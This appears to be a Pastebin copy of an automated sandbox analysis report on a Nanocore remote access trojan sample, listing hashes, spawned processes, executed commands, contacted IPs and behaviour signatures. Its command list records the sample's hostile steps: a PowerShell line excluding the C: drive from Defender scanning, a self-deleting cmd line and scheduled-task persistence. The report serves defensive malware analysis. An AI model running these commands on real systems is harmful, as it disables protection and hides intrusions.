paladin316

Exes_b74568d64360d5a29bc46ba1ff214e1f_exe_2019-08-10_13_30.txt

Aug 10th, 2019
2,739
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 88.36 KB | None | 0 0
  1.  
  2. * MalFamily: "Nanocore"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_b74568d64360d5a29bc46ba1ff214e1f.exe"
  7. * File Size: 702976
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  9. * SHA256: "9ba204fc6b15ab19005f46f7039f020873bd66f344870e99d64580d6b30bb14c"
  10. * MD5: "b74568d64360d5a29bc46ba1ff214e1f"
  11. * SHA1: "31db0432eb36b671cb567d3679f6352e9ea29f9b"
  12. * SHA512: "a0f5aed901a9a24f35ca3d7de9eb47989c22e14d2710a21c0de7d916870048804faf5b41cd60f93b8c7fe2e8654440eabd561f1277a0c7eedcda6077132169db"
  13. * CRC32: "43DD83BC"
  14. * SSDEEP: "12288:2anmrqJK6/cwtvdWEDPtCZphH5Xl5LqVatQSoxKuL82VkoLK7hvZsB9aOroz+n:zmmh3d3D0ZphVl5GMhKnLnhKtvZeYOX"
  15.  
  16. * Process Execution:
  17. "Exes_b74568d64360d5a29bc46ba1ff214e1f.exe",
  18. "powershell.exe",
  19. "images.exe",
  20. "powershell.exe",
  21. "z.nlfG.zF.exe",
  22. "wscript.exe",
  23. "etx.exe",
  24. "etx.exe",
  25. "RegSvcs.exe",
  26. "schtasks.exe",
  27. "schtasks.exe",
  28. "kB.bDFDD..exe",
  29. "images.exe",
  30. "powershell.exe",
  31. "xH.C.oIjg.exe",
  32. "wscript.exe",
  33. "etx.exe",
  34. "etx.exe",
  35. "RegSvcs.exe",
  36. "qDABnKekr.exe",
  37. "powershell.exe",
  38. "cmd.exe",
  39. "qDABnKekr.exe",
  40. "powershell.exe",
  41. ".rprs.B.d.exe",
  42. "wscript.exe",
  43. "etx.exe",
  44. "etx.exe",
  45. "RegSvcs.exe",
  46. "cmd.exe",
  47. "PING.EXE",
  48. "powershell.exe",
  49. "cmd.exe",
  50. "PING.EXE",
  51. "services.exe",
  52. "svchost.exe",
  53. "WmiPrvSE.exe",
  54. "svchost.exe",
  55. "WMIADAP.exe",
  56. "svchost.exe",
  57. "svchost.exe",
  58. "svchost.exe",
  59. "svchost.exe",
  60. "lsass.exe",
  61. "svchost.exe",
  62. "svchost.exe",
  63. "WerFault.exe",
  64. "lsass.exe",
  65. "lsass.exe"
  66.  
  67.  
  68. * Executed Commands:
  69. "powershell Add-MpPreference -ExclusionPath C:\\",
  70. "C:\\Users\\user\\AppData\\Roaming\\z.nlfG.zF.exe ",
  71. "C:\\Users\\user\\AppData\\Roaming\\kB.bDFDD..exe ",
  72. "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\"",
  73. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  74. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  75. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs\"",
  76. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs ",
  77. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  78. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  79. "C:\\Windows\\system32\\lsass.exe",
  80. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  81. "\"C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe\" por=iwi",
  82. "etx.exe por=iwi",
  83. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
  84. "C:\\Users\\user\\AppData\\Roaming\\xH.C.oIjg.exe ",
  85. "C:\\Users\\user\\AppData\\Roaming\\qDABnKekr.exe ",
  86. "\"schtasks.exe\" /create /f /tn \"DSL Subsystem\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp\"",
  87. "\"schtasks.exe\" /create /f /tn \"DSL Subsystem Task\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp\"",
  88. "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1212 -s 968",
  89. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
  90. "C:\\Users\\user\\AppData\\Roaming\\.rprs.B.d.exe ",
  91. "C:\\Windows\\system32\\PING.EXE ping 1.2.3.4 -n 2 -w 1000",
  92. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI"
  93.  
  94.  
  95. * Signatures Detected:
  96.  
  97. "Description": "At least one process apparently crashed during execution",
  98. "Details":
  99.  
  100.  
  101. "Description": "Attempts to connect to a dead IP:Port (4 unique times)",
  102. "Details":
  103.  
  104. "IP": "66.154.103.133:80"
  105.  
  106.  
  107. "IP": "172.217.5.110:80"
  108.  
  109.  
  110. "IP": "185.62.188.169:80"
  111.  
  112.  
  113. "IP": "79.134.225.32:20202"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Creates RWX memory",
  119. "Details":
  120.  
  121.  
  122. "Description": "Possible date expiration check, exits too soon after checking local time",
  123. "Details":
  124.  
  125. "process": "etx.exe, PID 2552"
  126.  
  127.  
  128.  
  129.  
  130. "Description": "Detected script timer window indicative of sleep style evasion",
  131. "Details":
  132.  
  133. "Window": "WSH-Timer"
  134.  
  135.  
  136.  
  137.  
  138. "Description": "A process attempted to delay the analysis task.",
  139. "Details":
  140.  
  141. "Process": "RegSvcs.exe tried to sleep 756 seconds, actually delayed analysis time by 0 seconds"
  142.  
  143.  
  144. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  145.  
  146.  
  147. "Process": "images.exe tried to sleep 503 seconds, actually delayed analysis time by 0 seconds"
  148.  
  149.  
  150. "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  151.  
  152.  
  153.  
  154.  
  155. "Description": "Loads a driver",
  156. "Details":
  157.  
  158. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  159.  
  160.  
  161.  
  162.  
  163. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  164. "Details":
  165.  
  166. "ioc": "v2.0.50727"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Network anomalies occured during the analysis.",
  172. "Details":
  173.  
  174. "Anomaly": "'1.2.3.4' getaddrinfo with no actual connection to the IP."
  175.  
  176.  
  177.  
  178.  
  179. "Description": "Reads data out of its own binary image",
  180. "Details":
  181.  
  182. "self_read": "process: images.exe, pid: 2476, offset: 0x00000000, length: 0x000aba00"
  183.  
  184.  
  185. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000000, length: 0x00000007"
  186.  
  187.  
  188. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000000, length: 0x00002000"
  189.  
  190.  
  191. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000007, length: 0x0016356a"
  192.  
  193.  
  194. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00001ff0, length: 0x00002000"
  195.  
  196.  
  197. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00003fe0, length: 0x00002000"
  198.  
  199.  
  200. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00005fd0, length: 0x00002000"
  201.  
  202.  
  203. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00007fc0, length: 0x00002000"
  204.  
  205.  
  206. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00009fb0, length: 0x00002000"
  207.  
  208.  
  209. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000bfa0, length: 0x00002000"
  210.  
  211.  
  212. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000df90, length: 0x00002000"
  213.  
  214.  
  215. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000ff80, length: 0x00002000"
  216.  
  217.  
  218. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00011f70, length: 0x00002000"
  219.  
  220.  
  221. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00013f60, length: 0x00002000"
  222.  
  223.  
  224. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00015f50, length: 0x00002000"
  225.  
  226.  
  227. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00017f40, length: 0x00002000"
  228.  
  229.  
  230. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00019f30, length: 0x00002000"
  231.  
  232.  
  233. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001bf20, length: 0x00002000"
  234.  
  235.  
  236. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001df10, length: 0x00002000"
  237.  
  238.  
  239. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001ff00, length: 0x00002000"
  240.  
  241.  
  242. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00021ef0, length: 0x00002000"
  243.  
  244.  
  245. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00023ee0, length: 0x00002000"
  246.  
  247.  
  248. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00025ed0, length: 0x00002000"
  249.  
  250.  
  251. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00027ec0, length: 0x00002000"
  252.  
  253.  
  254. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00029eb0, length: 0x00002000"
  255.  
  256.  
  257. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002bea0, length: 0x00002000"
  258.  
  259.  
  260. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002de90, length: 0x00002000"
  261.  
  262.  
  263. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002fe80, length: 0x00002000"
  264.  
  265.  
  266. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00031e70, length: 0x00002000"
  267.  
  268.  
  269. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00033e60, length: 0x00002000"
  270.  
  271.  
  272. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00035e50, length: 0x00002000"
  273.  
  274.  
  275. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00037e40, length: 0x00002000"
  276.  
  277.  
  278. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00039e30, length: 0x00002000"
  279.  
  280.  
  281. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003be20, length: 0x00002000"
  282.  
  283.  
  284. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003de10, length: 0x00002000"
  285.  
  286.  
  287. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003fe00, length: 0x00002000"
  288.  
  289.  
  290. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00041df0, length: 0x00002000"
  291.  
  292.  
  293. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00043de0, length: 0x00002000"
  294.  
  295.  
  296. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00045dd0, length: 0x00002000"
  297.  
  298.  
  299. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00047dc0, length: 0x00002000"
  300.  
  301.  
  302. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00049db0, length: 0x00002000"
  303.  
  304.  
  305. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004bda0, length: 0x00002000"
  306.  
  307.  
  308. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004dd90, length: 0x00002000"
  309.  
  310.  
  311. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004fd80, length: 0x00002000"
  312.  
  313.  
  314. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00050a00, length: 0x00000031"
  315.  
  316.  
  317. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00050a19, length: 0x0010ef19"
  318.  
  319.  
  320. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fae7, length: 0x00000028"
  321.  
  322.  
  323. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fd14, length: 0x00000028"
  324.  
  325.  
  326. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fef8, length: 0x00000028"
  327.  
  328.  
  329. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001600eb, length: 0x00000028"
  330.  
  331.  
  332. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001602ff, length: 0x00000028"
  333.  
  334.  
  335. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001604ed, length: 0x00000028"
  336.  
  337.  
  338. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001606b5, length: 0x00000027"
  339.  
  340.  
  341. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001608b2, length: 0x00000028"
  342.  
  343.  
  344. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160a9c, length: 0x00000029"
  345.  
  346.  
  347. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160c77, length: 0x00000028"
  348.  
  349.  
  350. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160eaa, length: 0x00000028"
  351.  
  352.  
  353. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001610b3, length: 0x00000028"
  354.  
  355.  
  356. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001612a2, length: 0x00000029"
  357.  
  358.  
  359. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161474, length: 0x00000028"
  360.  
  361.  
  362. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161643, length: 0x00000028"
  363.  
  364.  
  365. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0016180b, length: 0x00000028"
  366.  
  367.  
  368. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161a04, length: 0x00000028"
  369.  
  370.  
  371. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161c14, length: 0x00000028"
  372.  
  373.  
  374. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161dde, length: 0x00000028"
  375.  
  376.  
  377. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161fdc, length: 0x00000028"
  378.  
  379.  
  380. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001621ee, length: 0x00000028"
  381.  
  382.  
  383. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001623c0, length: 0x00000028"
  384.  
  385.  
  386. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001625a9, length: 0x00000028"
  387.  
  388.  
  389. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162777, length: 0x00000028"
  390.  
  391.  
  392. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162989, length: 0x00000028"
  393.  
  394.  
  395. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162b62, length: 0x00000028"
  396.  
  397.  
  398. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162d50, length: 0x00000028"
  399.  
  400.  
  401. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162f27, length: 0x00000028"
  402.  
  403.  
  404. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001630fe, length: 0x00000028"
  405.  
  406.  
  407. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001632d5, length: 0x00000028"
  408.  
  409.  
  410. "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001634b8, length: 0x0000001b"
  411.  
  412.  
  413. "self_read": "process: wscript.exe, pid: 1316, offset: 0x00000000, length: 0x00000040"
  414.  
  415.  
  416. "self_read": "process: wscript.exe, pid: 1316, offset: 0x000000f0, length: 0x00000018"
  417.  
  418.  
  419. "self_read": "process: wscript.exe, pid: 1316, offset: 0x000001e8, length: 0x00000078"
  420.  
  421.  
  422. "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018000, length: 0x00000020"
  423.  
  424.  
  425. "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018058, length: 0x00000018"
  426.  
  427.  
  428. "self_read": "process: wscript.exe, pid: 1316, offset: 0x000181a8, length: 0x00000018"
  429.  
  430.  
  431. "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018470, length: 0x00000010"
  432.  
  433.  
  434. "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018640, length: 0x00000012"
  435.  
  436.  
  437. "self_read": "process: images.exe, pid: 2520, offset: 0x00000000, length: 0x000aba00"
  438.  
  439.  
  440. "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000000, length: 0x00001000"
  441.  
  442.  
  443. "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000080, length: 0x00000200"
  444.  
  445.  
  446. "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000178, length: 0x00000200"
  447.  
  448.  
  449. "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00005b20, length: 0x00000200"
  450.  
  451.  
  452. "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00005b3c, length: 0x00000200"
  453.  
  454.  
  455. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000000, length: 0x00000007"
  456.  
  457.  
  458. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000000, length: 0x00002000"
  459.  
  460.  
  461. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000007, length: 0x0016356a"
  462.  
  463.  
  464. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00001ff0, length: 0x00002000"
  465.  
  466.  
  467. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00003fe0, length: 0x00002000"
  468.  
  469.  
  470. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00005fd0, length: 0x00002000"
  471.  
  472.  
  473. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00007fc0, length: 0x00002000"
  474.  
  475.  
  476. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00009fb0, length: 0x00002000"
  477.  
  478.  
  479. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000bfa0, length: 0x00002000"
  480.  
  481.  
  482. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000df90, length: 0x00002000"
  483.  
  484.  
  485. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000ff80, length: 0x00002000"
  486.  
  487.  
  488. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00011f70, length: 0x00002000"
  489.  
  490.  
  491. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00013f60, length: 0x00002000"
  492.  
  493.  
  494. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00015f50, length: 0x00002000"
  495.  
  496.  
  497. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00017f40, length: 0x00002000"
  498.  
  499.  
  500. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00019f30, length: 0x00002000"
  501.  
  502.  
  503. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001bf20, length: 0x00002000"
  504.  
  505.  
  506. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001df10, length: 0x00002000"
  507.  
  508.  
  509. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001ff00, length: 0x00002000"
  510.  
  511.  
  512. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00021ef0, length: 0x00002000"
  513.  
  514.  
  515. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00023ee0, length: 0x00002000"
  516.  
  517.  
  518. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00025ed0, length: 0x00002000"
  519.  
  520.  
  521. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00027ec0, length: 0x00002000"
  522.  
  523.  
  524. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00029eb0, length: 0x00002000"
  525.  
  526.  
  527. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002bea0, length: 0x00002000"
  528.  
  529.  
  530. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002de90, length: 0x00002000"
  531.  
  532.  
  533. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002fe80, length: 0x00002000"
  534.  
  535.  
  536. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00031e70, length: 0x00002000"
  537.  
  538.  
  539. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00033e60, length: 0x00002000"
  540.  
  541.  
  542. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00035e50, length: 0x00002000"
  543.  
  544.  
  545. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00037e40, length: 0x00002000"
  546.  
  547.  
  548. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00039e30, length: 0x00002000"
  549.  
  550.  
  551. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003be20, length: 0x00002000"
  552.  
  553.  
  554. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003de10, length: 0x00002000"
  555.  
  556.  
  557. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003fe00, length: 0x00002000"
  558.  
  559.  
  560. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00041df0, length: 0x00002000"
  561.  
  562.  
  563. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00043de0, length: 0x00002000"
  564.  
  565.  
  566. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00045dd0, length: 0x00002000"
  567.  
  568.  
  569. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00047dc0, length: 0x00002000"
  570.  
  571.  
  572. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00049db0, length: 0x00002000"
  573.  
  574.  
  575. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004bda0, length: 0x00002000"
  576.  
  577.  
  578. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004dd90, length: 0x00002000"
  579.  
  580.  
  581. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004fd80, length: 0x00002000"
  582.  
  583.  
  584. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00050a00, length: 0x00000031"
  585.  
  586.  
  587. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00050a19, length: 0x00001bba"
  588.  
  589.  
  590. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000e9c02, length: 0x0000002c"
  591.  
  592.  
  593. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000ff9c4, length: 0x00000026"
  594.  
  595.  
  596. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000ffa3d, length: 0x0000002a"
  597.  
  598.  
  599. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015d85b, length: 0x00000028"
  600.  
  601.  
  602. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015da50, length: 0x00000028"
  603.  
  604.  
  605. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015dc28, length: 0x00000028"
  606.  
  607.  
  608. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015de57, length: 0x00000028"
  609.  
  610.  
  611. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e028, length: 0x00000028"
  612.  
  613.  
  614. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e208, length: 0x00000028"
  615.  
  616.  
  617. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e40e, length: 0x00000027"
  618.  
  619.  
  620. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e5de, length: 0x00000028"
  621.  
  622.  
  623. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e7dd, length: 0x00000028"
  624.  
  625.  
  626. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e9d3, length: 0x00000028"
  627.  
  628.  
  629. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ebd3, length: 0x00000028"
  630.  
  631.  
  632. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ed9e, length: 0x00000028"
  633.  
  634.  
  635. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ef6f, length: 0x00000028"
  636.  
  637.  
  638. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f149, length: 0x00000029"
  639.  
  640.  
  641. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f326, length: 0x00000028"
  642.  
  643.  
  644. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f502, length: 0x00000027"
  645.  
  646.  
  647. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f706, length: 0x00000028"
  648.  
  649.  
  650. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f90a, length: 0x00000028"
  651.  
  652.  
  653. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fae7, length: 0x00000028"
  654.  
  655.  
  656. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fd14, length: 0x00000028"
  657.  
  658.  
  659. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fef8, length: 0x00000028"
  660.  
  661.  
  662. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001600eb, length: 0x00000028"
  663.  
  664.  
  665. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001602ff, length: 0x00000028"
  666.  
  667.  
  668. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001604ed, length: 0x00000028"
  669.  
  670.  
  671. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001606b5, length: 0x00000027"
  672.  
  673.  
  674. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001608b2, length: 0x00000028"
  675.  
  676.  
  677. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160a9c, length: 0x00000029"
  678.  
  679.  
  680. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160c77, length: 0x00000028"
  681.  
  682.  
  683. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160eaa, length: 0x00000028"
  684.  
  685.  
  686. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001610b3, length: 0x00000028"
  687.  
  688.  
  689. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001612a2, length: 0x00000029"
  690.  
  691.  
  692. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161474, length: 0x00000028"
  693.  
  694.  
  695. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161643, length: 0x00000028"
  696.  
  697.  
  698. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0016180b, length: 0x00000028"
  699.  
  700.  
  701. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161a04, length: 0x00000028"
  702.  
  703.  
  704. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161c14, length: 0x00000028"
  705.  
  706.  
  707. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161dde, length: 0x00000028"
  708.  
  709.  
  710. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161fdc, length: 0x00000050"
  711.  
  712.  
  713. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162216, length: 0x00000028"
  714.  
  715.  
  716. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001623e8, length: 0x00000028"
  717.  
  718.  
  719. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001625d1, length: 0x00000028"
  720.  
  721.  
  722. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0016279f, length: 0x00000028"
  723.  
  724.  
  725. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001629b1, length: 0x00000028"
  726.  
  727.  
  728. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162b8a, length: 0x00000028"
  729.  
  730.  
  731. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162d78, length: 0x00000028"
  732.  
  733.  
  734. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162f4f, length: 0x00000028"
  735.  
  736.  
  737. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00163126, length: 0x00000028"
  738.  
  739.  
  740. "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001632fd, length: 0x0000001b"
  741.  
  742.  
